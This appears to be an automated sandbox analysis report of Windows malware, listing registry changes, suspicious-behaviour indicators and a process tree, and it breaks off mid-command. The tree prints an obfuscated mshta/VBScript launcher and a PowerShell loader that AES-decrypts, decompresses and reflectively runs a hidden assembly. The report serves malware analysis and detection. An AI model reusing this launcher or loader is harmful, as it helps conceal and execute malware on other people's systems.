0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b209c25124f2da01b209c25124f2da01b209c25124f2da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000
00005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000135929552000636434383964643066373133353561626533306134333735383030643665396336666233316137383165396438343136636130393365316166366532363937350000b20009000400efbe13592955135929552e000000000000000000000000000000000000000000000000004ed1e000630064003400380039006400640030006600370031003300350035006100620065003300300061003400330037003500380030003000640036006500390063003600660062003300310061003700380031006500390064003800340031003600630061003000390033006500310061006600360065003200360039003700350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000fb1c7a161000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c697665
72794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63643438396464306637313335356162653330613433373538303064366539633666623331613738316539643834313663613039336531616636653236393735000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000657268716a7679710000000000000000c8d7c3314953e644a4ec9fb3f89bbbe93318079ed650ef1198ccde20cd0d11aac8d7c3314953e644a4ec9fb3f89bbbe93318079ed650ef1198ccde20cd0d11aad2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100390034003100330030003000360035002d0033003400370031003200310032003500350036002d0031003600350036003900340037003700320034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9aa8484000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = "8324" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\56e140ad-72bd-4b87 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = 13a62c5524f2da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 020000000100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = 6fbdf45724f2da01 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f39d3a4e-271a-4035 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = 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 RuntimeBroker.exe Set 
value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 6e00320067d29e0013592d5520004c41554e43487e332e5a49500000520009000400efbe13592d5513592e552e000000000000000000000000000000000000000000000000001bb243004c00610075006e00630068006500720020002800330029002e007a006900700000001c000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f39d3a4e-271a-4035 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = be8d1f5224f2da01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40f7a7ee-19a2-432e = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\419165c72f231ed688b46dd838505203525915ca0a80684b4c73a3cc420fc42c" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = 14261a5224f2da01 RuntimeBroker.exe 
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3372 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 224 msedge.exe 224 msedge.exe 2596 msedge.exe 2596 msedge.exe 3668 identity_helper.exe 3668 identity_helper.exe 4320 msedge.exe 4320 msedge.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 6032 powershell.exe 3908 msedge.exe 3908 msedge.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5764 $sxr-powershell.exe 5764 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5764 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5764 $sxr-powershell.exe 5764 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe 5872 $sxr-powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3372 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 6032 powershell.exe Token: SeDebugPrivilege 5872 $sxr-powershell.exe Token: SeDebugPrivilege 5872 $sxr-powershell.exe Token: SeDebugPrivilege 5872 $sxr-powershell.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeDebugPrivilege 5764 $sxr-powershell.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 3936 RuntimeBroker.exe Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 4224 mousocoreworker.exe Token: SeCreatePagefilePrivilege 4224 mousocoreworker.exe Token: SeShutdownPrivilege 3936 RuntimeBroker.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 316 dwm.exe Token: SeCreatePagefilePrivilege 316 dwm.exe Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: 
SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE Token: SeCreatePagefilePrivilege 3372 Explorer.EXE Token: SeShutdownPrivilege 3372 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe 2596 msedge.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1152 OpenWith.exe 5872 $sxr-powershell.exe 3372 Explorer.EXE 3372 Explorer.EXE -
Suspicious use of UnmapMainImage 3 IoCs
pid Process 3372 Explorer.EXE 3936 RuntimeBroker.exe 3324 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2596 wrote to memory of 4692 2596 msedge.exe 84 PID 2596 wrote to memory of 4692 2596 msedge.exe 84 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 
msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 224 2596 msedge.exe 86 PID 2596 wrote to memory of 224 2596 msedge.exe 86 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1104 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2804
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-NjlmzKYslurHzAOReMmu4312:DjJrktJf=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3472 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-NjlmzKYslurHzAOReMmu4312:DjJrktJf=%3⤵
- Executes dropped EXE
PID:5796 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function qMtRC($gWzGN){ $GdrFH=[System.Security.Cryptography.Aes]::Create(); $GdrFH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GdrFH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GdrFH.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('ebO+Aryuk6gf0BxazN+wB5J+avy0lg7JHhkLWe8y2yI='); $GdrFH.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('xVLhhOD/brto5F3wxDlgbg=='); $hORPG=$GdrFH.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $Vjthl=$hORPG.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($gWzGN, 0, $gWzGN.Length); $hORPG.Dispose(); $GdrFH.Dispose(); $Vjthl;}function OZFAi($gWzGN){ $FFyoT=New-Object System.IO.MemoryStream(,$gWzGN); $mVCUn=New-Object System.IO.MemoryStream; Invoke-Expression '$RAoQb @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$FFyoT,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $RAoQb.CopyTo($mVCUn); $RAoQb.Dispose(); $FFyoT.Dispose(); $mVCUn.Dispose(); $mVCUn.ToArray();}function sohYQ($gWzGN){ $Vjthl = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($gWzGN); $Vjthl = qMtRC($Vjthl); $Vjthl = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($Vjthl); return $Vjthl;}function execute_function($gWzGN,$ZjYBc){ $oHnMF = @( '$TTMkY = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$gWzGN);'.Replace('@', ''), '$HKdVE = $TTMkY.EntryPoint;', '$HKdVE.Invoke($null, $ZjYBc);' ); foreach ($LLPuJ in $oHnMF) { Invoke-Expression $LLPuJ };}$eozqm = sohYQ('ZW7xhgvLHXMUe5bc4eXVuA==');$Mfplr = sohYQ('PC/5zwoH62em+JweMmmnRF6FFlFwMgxIEjUMY2OAf+E=');$CovkQ = sohYQ('61e5zkqK6YHhnF314dvBlQ==');$pgsFe = sohYQ('VzpK5zKQOkmaog2Fh3I7Hw==');if (@(get-process -ea silentlycontinue 